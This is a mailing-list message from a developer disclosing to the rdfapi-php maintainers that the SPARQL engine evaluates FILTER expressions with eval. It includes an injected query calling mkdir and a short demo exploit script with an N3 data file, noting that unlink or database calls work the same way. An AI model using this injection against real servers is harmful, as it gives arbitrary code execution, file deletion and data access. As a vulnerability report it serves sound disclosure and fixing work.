Re: [Rdfapi-php-interest] SparqlEngine / regex passes?

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 422-6466

Tobias,

> The regex function is evaluated in
> rdfapi-php\api\sparql\FilterFunctions.php. It works fine for me. Did yo=
u
> change something with the import mechanism so that this file is not
> imported with the sparql package?
Yes, I did change my imports a bit.

Now that I understand how you did this, I discovered that your eval'ing
code lets someone fully exploit a server that lets you input own sparql
queries:
--------------
SELECT ?a WHERE {
?a ?b ?c .
FILTER mkdir('/home/cweiske/exploit')
}
--------------

You can put anything instead of mkdir, inkl. unlink, sql database access
and everything.

Working demo exploit:
exploit.php:
---------------------
<?php
require_once(dirname(__FILE__) . '/../config.php');
require_once RDFAPI_INCLUDE_DIR . 'RdfAPI.php';
require_once RDFAPI_INCLUDE_DIR . 'sparql/SparqlParser.php';
require_once RDFAPI_INCLUDE_DIR . 'sparql/SparqlEngine.php';

$parser =3D new SparqlParser();
$graphset =3D ModelFactory::getDatasetMem('Dataset1');
$def    =3D $graphset->getDefaultGraph();
$def    ->load(dirname(__FILE__) . '/exploit.n3');
$qs     =3D "
SELECT ?a WHERE {
?a ?b ?c .
FILTER mkdir('/home/cweiske/exploit')
}
";
$q      =3D $parser->parse($qs);
$engine =3D SparqlEngine::factory();
$t      =3D $engine->queryModel($graphset, $q, false);
?>
---------------------

exploit.n3:
---------------------
@prefix foaf:       <http://xmlns.com/foaf/0.1/> .
@prefix rdf:        <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .
_:alice rdf:type        foaf:Person ;  .
---------------------

--=20
Regards/Mit freundlichen Gr=FC=DFen
Christian Weiske